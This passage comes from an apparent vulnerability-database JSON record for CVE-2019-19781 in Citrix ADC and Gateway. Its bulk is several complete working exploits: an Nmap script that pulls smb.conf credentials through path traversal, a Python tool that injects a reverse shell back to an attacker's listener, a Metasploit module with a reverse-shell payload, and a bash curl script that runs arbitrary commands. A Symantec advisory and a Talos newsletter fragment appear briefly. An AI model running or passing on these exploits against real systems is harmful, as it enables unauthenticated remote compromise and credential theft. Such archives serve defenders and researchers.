Path Traversal aka (Shitrix)</elem> \n-- <elem key=\"state\">VULNERABLE</elem> \n-- <table key=\"description\"> \n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5, \n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path \n-- traversal vulnerability that allows attackers to read configurations or \nany other file. \n-- </table> \n-- <table key=\"dates\"> \n-- <table key=\"disclosure\"> \n-- <elem key=\"year\">2019</elem> \n-- <elem key=\"day\">17</elem> \n-- <elem key=\"month\">12</elem> \n-- </table> \n-- </table> \n-- <elem key=\"disclosure\">17-12-2019</elem> \n-- <table key=\"extra_info\"> \n-- </table> \n-- <table key=\"refs\"> \n-- <elem>https://support.citrix.com/article/CTX267027</elem> \n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem> \n-- </table> \n-- </table> \n \nauthor = \"Dhiraj Mishra (@RandomDhiraj)\" \nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = {\"discovery\", \"intrusive\",\"vuln\"} \n \nportrule = shortport.ssl \n \naction = function(host,port) \nlocal outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil \nlocal vuln = { \ntitle = 'Citrix ADC Path Traversal', \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, \n12.1, and 13.0 are vulnerable \nto a unauthenticated path traversal vulnerability that allows attackers to \nread configurations or any other file. \n]], \nreferences = { \n'https://support.citrix.com/article/CTX267027', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-19781', \n}, \ndates = { \ndisclosure = {year = '2019', month = '12', day = '17'}, \n}, \n} \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \nlocal path = \"/vpn/../vpns/cfg/smb.conf\" \nlocal response \nlocal output = {} \nlocal success = \"Host is vulnerable to CVE-2019-19781\" \nlocal fail = \"Host is not vulnerable\" \nlocal match = \"[global]\" \nlocal credentials \nlocal citrixADC \nresponse = http.get(host, port.number, path) \n \nif not response.status then \nstdnse.print_debug(\"Request Failed\") \nreturn \nend \nif response.status == 200 then \nif string.match(response.body, match) then \nstdnse.print_debug(\"%s: %s GET %s - 200 OK\", \nSCRIPT_NAME,host.targetname or host.ip, path) \nvuln.state = vulns.STATE.VULN \ncitrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname \nor host.ip,port.number, path)) \nif outputFile then \ncredentials = response.body:gsub('%W','.') \nvuln.check_results = stdnse.format_output(true, citrixADC) \nvuln.extra_info = stdnse.format_output(true, \"Credentials are being \nstored in the output file\") \nfile = io.open(outputFile, \"a\") \nfile:write(credentials, \"\\n\") \nelse \nvuln.check_results = stdnse.format_output(true, citrixADC) \nend \nend \nelseif response.status == 403 then \nstdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname \nor host.ip, path, response.status) \nvuln.state = vulns.STATE.NOT_VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155972/cadcg-traversal.nse.txt"}], "symantec": [{"lastseen": "2021-06-08T18:51:35", "description": "### Description\n\nMultiple Citrix Products are prone to a remote code-execution vulnerability. Successfully exploiting this issue will allow attackers to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Citrix NetScaler Gateway 10.5 \n * Citrix NetScaler Gateway 11.1 \n * Citrix NetScaler Gateway 12.0 \n * Citrix NetScaler Gateway 12.1 \n * Citrix NetScaler Gateway 13.0 \n * Citrix Netscaler Application Delivery Controller 10.5 \n * Citrix Netscaler Application Delivery Controller 11.1 \n * Citrix Netscaler Application Delivery Controller 12.0 \n * Citrix Netscaler Application Delivery Controller 12.1 \n * Citrix Netscaler Application Delivery Controller 13.0 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as non-executable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2019-12-17T00:00:00", "type": "symantec", "title": "Multiple Citrix Products CVE-2019-19781 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2019-12-17T00:00:00", "id": "SMNTC-111238", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111238", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "href": "", "sourceData": "#!/usr/bin/python3\n#\n# Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\n#\n# You only need a listener like netcat to catch the shell.\n#\n# Shout out to the team: Rob Simon, Justin Elze, Logan Sampson, Geoff Walton, Christopher Paschen, Kevin Haubris, Scott White\n#\n# Tool Written by: Rob Simon and David Kennedy\n\nimport requests\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings\nimport random\nimport string\nimport time\nfrom random import randint\nimport argparse\nimport sys\n\n# random string generator\ndef randomString(stringLength=10):\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\n\n# our random string for filename - will leave artifacts on system\nfilename = randomString()\nrandomuser = randomString()\n\n# generate random number for the nonce\nnonce = randint(5, 15) \n\n# this is our first stage which will write out the file through the Citrix traversal issue and the newbm.pl script\n# note that the file location will be in /netscaler/portal/templates/filename.xml\ndef stage1(filename, randomuser, nonce, victimip, victimport, attackerip, attackerport):\n\n # encoding our payload stub for one netcat listener - awesome work here Rob Simon (KC)\n encoded = \"\"\n i=0\n text = (\"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"%s\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\"\"\" % (attackerip, attackerport))\n while i < len(text):\n encoded = encoded + \"chr(\"+str(ord(text[i]))+\") . \"\n i += 1\n encoded = encoded[:-3]\n payload=\"[% template.new({'BLOCK'='print readpipe(\" + encoded + \")'})%]\"\n headers = ( \n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '../../../netscaler/portal/templates/%s' % (filename),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n data = (\n {\n \"url\" : \"127.0.0.1\",\n \"title\" : payload,\n \"desc\" : \"desc\",\n \"UI_inuse\" : \"a\"\n })\n\n url = (\"https://%s:%s/vpn/../vpns/portal/scripts/newbm.pl\" % (victimip, victimport))\n requests.post(url, data=data, headers=headers, verify=False)\n\n# this is our second stage that triggers the exploit for us\ndef stage2(filename, randomuser, nonce, victimip, victimport):\n headers = (\n {\n 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0',\n 'NSC_USER' : '%s' % (randomuser),\n 'NSC_NONCE' : '%s' % (nonce),\n })\n\n requests.get(\"https://%s:%s/vpn/../vpns/portal/%s.xml\" % (victimip, victimport, filename), headers=headers, verify=False)\n\n\n# start our main code to execute\nprint('''\n\n .o oOOOOOOOo OOOo\n Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO\n OboO\"\"\"\"\"\"\"\"\"\"\"\".OOo. .oOOOOOo. OOOo.oOOOOOo..\"\"\"\"\"\"\"\"\"'OO\n OOP.oOOOOOOOOOOO \"POOOOOOOOOOOo. `\"OOOOOOOOOP,OOOOOOOOOOOB'\n `O'OOOO' `OOOOo\"OOOOOOOOOOO` .adOOOOOOOOO\"oOOO' `OOOOo\n .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO\n OOOOO '\"OOOOOOOOOOOOOOOO\"` oOO\n oOOOOOba. .adOOOOOOOOOOba .adOOOOo.\n oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO\n OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO\"` '\"OOOOOOOOOOOOO.OOOOOOOOOOOOOO\n \"OOOO\" \"YOoOOOOMOIONODOO\"` . '\"OOROAOPOEOOOoOY\" \"OOO\"\n Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`\n : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .\n . oOOP\"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO\"OOo\n '%o OOOO\"%OOOO%\"%OOOOO\"OOOOOO\"OOO':\n `$\" `OOOO' `O\"Y ' `OOOO' o .\n . . OP\" : o .\n :\n\nCitrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781\nTool Written by: Rob Simon and Dave Kennedy\nContributions: The TrustedSec Team \nWebsite: https://www.trustedsec.com\nINFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/\n\nThis tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used\nto append files in an XML format to the victim machine. This in turn allows for remote code execution.\n\nBe sure to cleanup these two file locations:\n /var/tmp/netscaler/portal/templates/\n /netscaler/portal/templates/\n\nUsage:\n\npython citrixmash.py <victimipaddress> <victimport> <attacker_listener> <attacker_port>\\n''')\n\n# parse our commands\nparser = argparse.ArgumentParser()\nparser.add_argument(\"target\", help=\"the vulnerable server with Citrix (defaults https)\")\nparser.add_argument(\"targetport\", help=\"the target server web port (normally on 443)\")\nparser.add_argument(\"attackerip\", help=\"the attackers reverse listener IP address\")\nparser.add_argument(\"attackerport\", help=\"the attackersa reverse listener port\")\nargs = parser.parse_args()\nprint(\"[*] Firing STAGE1 POST request to create the XML template exploit to disk...\")\nprint(\"[*] Saving filename as %s.xml on the victim machine...\" % (filename))\n# trigger our first post\nstage1(filename, randomuser, nonce, args.target, args.targetport, args.attackerip, args.attackerport)\nprint(\"[*] Sleeping for 2 seconds to ensure file is written before we call it...\")\ntime.sleep(2)\nprint(\"[*] Triggering GET request for the newly created file with a listener waiting...\")\nprint(\"[*] Shell should now be in your listener... enjoy. Keep this window open..\")\nprint(\"[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/\")\n# trigger our second post\nstage2(filename, randomuser, nonce, args.target, args.targetport)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-16T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-16T00:00:00", "id": "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "href": "", "sourceData": "# Exploit Title: Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal\n# Date: 2019-12-17\n# CVE: CVE-2019-19781\n# Vulenrability: Path Traversal\n# Vulnerablity Discovery: Mikhail Klyuchnikov\n# Exploit Author: Dhiraj Mishra\n# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0\n# Vendor Homepage: https://www.citrix.com/\n# References: https://support.citrix.com/article/CTX267027\n# https://github.com/nmap/nmap/pull/1893\n\nlocal http = require \"http\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\nlocal table = require \"table\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal nmap = require \"nmap\"\nlocal io = require \"io\"\n\ndescription = [[\nThis NSE script checks whether the traget server is vulnerable to\nCVE-2019-19781\n]]\n---\n-- @usage\n-- nmap --script https-citrix-path-traversal -p <port> <host>\n-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args\noutput='file.txt'\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open http\n-- | CVE-2019-19781:\n-- | Host is vulnerable to CVE-2019-19781\n-- @changelog\n-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)\n-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)\n-- @xmloutput\n-- <table key=\"NMAP-1\">\n-- <elem key=\"title\">Citrix ADC Path Traversal aka (Shitrix)</elem>\n-- <elem key=\"state\">VULNERABLE</elem>\n-- <table key=\"description\">\n-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,\n11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path\n-- traversal vulnerability that allows attackers to read configurations or\nany other file.\n-- </table>\n-- <table key=\"dates\">\n-- <table key=\"disclosure\">\n-- <elem key=\"year\">2019</elem>\n-- <elem key=\"day\">17</elem>\n-- <elem key=\"month\">12</elem>\n-- </table>\n-- </table>\n-- <elem key=\"disclosure\">17-12-2019</elem>\n-- <table key=\"extra_info\">\n-- </table>\n-- <table key=\"refs\">\n-- <elem>https://support.citrix.com/article/CTX267027</elem>\n-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>\n-- </table>\n-- </table>\n\nauthor = \"Dhiraj Mishra (@RandomDhiraj)\"\nDiscovery = \"Mikhail Klyuchnikov (@__Mn1__)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\",\"vuln\"}\n\nportrule = shortport.ssl\n\naction = function(host,port)\n local outputFile = stdnse.get_script_args(SCRIPT_NAME..\".output\") or nil\n local vuln = {\n title = 'Citrix ADC Path Traversal',\n state = vulns.STATE.NOT_VULN,\n description = [[\nCitrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,\n12.1, and 13.0 are vulnerable\nto a unauthenticated path traversal vulnerability that allows attackers to\nread configurations or any other file.\n ]],\n references = {\n 'https://support.citrix.com/article/CTX267027',\n 'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',\n },\n dates = {\n disclosure = {year = '2019', month = '12', day = '17'},\n },\n }\n local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)\n local path = \"/vpn/../vpns/cfg/smb.conf\"\n local response\n local output = {}\n local success = \"Host is vulnerable to CVE-2019-19781\"\n local fail = \"Host is not vulnerable\"\n local match = \"[global]\"\n local credentials\n local citrixADC\n response = http.get(host, port.number, path)\n\n if not response.status then\n stdnse.print_debug(\"Request Failed\")\n return\n end\n if response.status == 200 then\n if string.match(response.body, match) then\n stdnse.print_debug(\"%s: %s GET %s - 200 OK\",\nSCRIPT_NAME,host.targetname or host.ip, path)\n vuln.state = vulns.STATE.VULN\n citrixADC = ((\"Path traversal: https://%s:%d%s\"):format(host.targetname\nor host.ip,port.number, path))\n if outputFile then\n credentials = response.body:gsub('%W','.')\nvuln.check_results = stdnse.format_output(true, citrixADC)\n vuln.extra_info = stdnse.format_output(true, \"Credentials are being\nstored in the output file\")\nfile = io.open(outputFile, \"a\")\nfile:write(credentials, \"\\n\")\n else\n vuln.check_results = stdnse.format_output(true, citrixADC)\n end\n end\n elseif response.status == 403 then\n stdnse.print_debug(\"%s: %s GET %s - %d\", SCRIPT_NAME, host.targetname\nor host.ip, path, response.status)\n vuln.state = vulns.STATE.NOT_VULN\n end\n\n return vuln_report:make_output(vuln)\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC Remote Code Execution',\n 'Description' => %q(\n An issue was discovered in Citrix Application Delivery Controller (ADC)\n and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n ),\n 'Author' => [\n 'RAMELLA S\u00e9bastien' # https://www.pirates.re/\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],\n ['EDB', '47901'],\n ['EDB', '47902']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl meterpreter'\n }\n },\n 'Targets' => [\n ['Unix (remote shell)',\n 'Type' => :cmd_shell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl',\n 'DisablePayloadHandler' => 'false'\n }\n ],\n ['Unix (command-line)',\n 'Type' => :cmd_generic,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptAddress.new('RHOST', [true, 'The target address'])\n ])\n\n register_advanced_options([\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ])\n\n deregister_options('RHOSTS')\n end\n\n def execute_command(command, opts = {})\n filename = Rex::Text.rand_text_alpha(16)\n nonce = Rex::Text.rand_text_alpha(6)\n\n request = {\n 'method' => 'POST',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'),\n 'headers' => {\n 'NSC_USER' => '../../../netscaler/portal/templates/' + filename,\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => 'http://127.0.0.1',\n 'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\",\n 'desc' => 'desc',\n 'UI_inuse' => 'RfWeb'\n },\n 'encode_params' => false\n }\n\n begin\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n\n if received.code == 200\n vprint_status(\"#{received.get_html_document.text}\")\n sleep 2\n\n request = {\n 'method' => 'GET',\n 'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'),\n 'headers' => {\n 'NSC_USER' => nonce,\n 'NSC_NONCE' => nonce\n }\n }\n\n ## Trigger to gain exploitation.\n begin\n send_request_cgi(request)\n received = send_request_cgi(request)\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n return false unless received\n return received\n end\n\n return false\n end\n\n def get_chr_payload(command)\n chr_payload = command\n i = chr_payload.length\n\n output = \"\"\n chr_payload.each_char do | c |\n i = i - 1\n output << \"chr(\" << c.ord.to_s << \")\"\n if i != 0\n output << \" . \"\n end\n end\n\n return output\n end\n\n def check\n begin\n received = send_request_cgi(\n \"method\" => \"GET\",\n \"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf')\n )\n rescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN\n print_error('Unable to connect on the remote target.')\n end\n\n if received && received.code != 200\n return Exploit::CheckCode::Safe\n end\n return Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n unless check.eql? Exploit::CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n else\n print_good('The target appears to be vulnerable.')\n end\n\n case target['Type']\n when :cmd_generic\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n received = execute_command(payload.encoded)\n if (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\")\n print_warning('Dumping command output in parsed http response')\n print_good(\"#{received.get_html_document.text}\")\n else\n print_warning('Empty response, no command output')\n return\n end\n\n when :cmd_shell\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n\n execute_command(payload.encoded)\n end\n end\n\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:39:50", "description": "\nCitrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-11T00:00:00", "type": "exploitpack", "title": "Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "href": "", "sourceData": "#!/bin/bash\n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781\n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'\n# Release Date : 11/01/2020\n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia\necho \"=================================================================================\n ___ _ _ ____ ___ _ _\n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _\n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' |\n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_|\n |__/ CVE-2019-19781\n=================================================================================\"\n##############################\nif [ -z \"$1\" ];\nthen\necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n'\nexit;\nfi\nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);\ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is\necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is\necho -ne \"Command Output :\\n\"\ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2020-01-30T19:31:49", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nBe sure to pay close attention Tuesday for [some changes we have coming to Snort.org](<https://blog.snort.org/2020/01/area-under-construction-snort.html>). We\u2019ll spare you the details for now, but please bear with us if the search function isn\u2019t working correctly for you or you see anything else wonky on the site. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0117-0124.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **A World of Threats: When DNS becomes the new weapon for governments at [Swiss Cyber Security Days](<https://swisscybersecuritydays.ch/en/programme-en/>)** ** \n**Location: **Forum Fribourg, Granges-Paccot, Switzerland \n**Date: **Feb. 12 - 13 \n**Speakers: **Paul Rascagn\u00e8res \n**Synopsis: **In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We 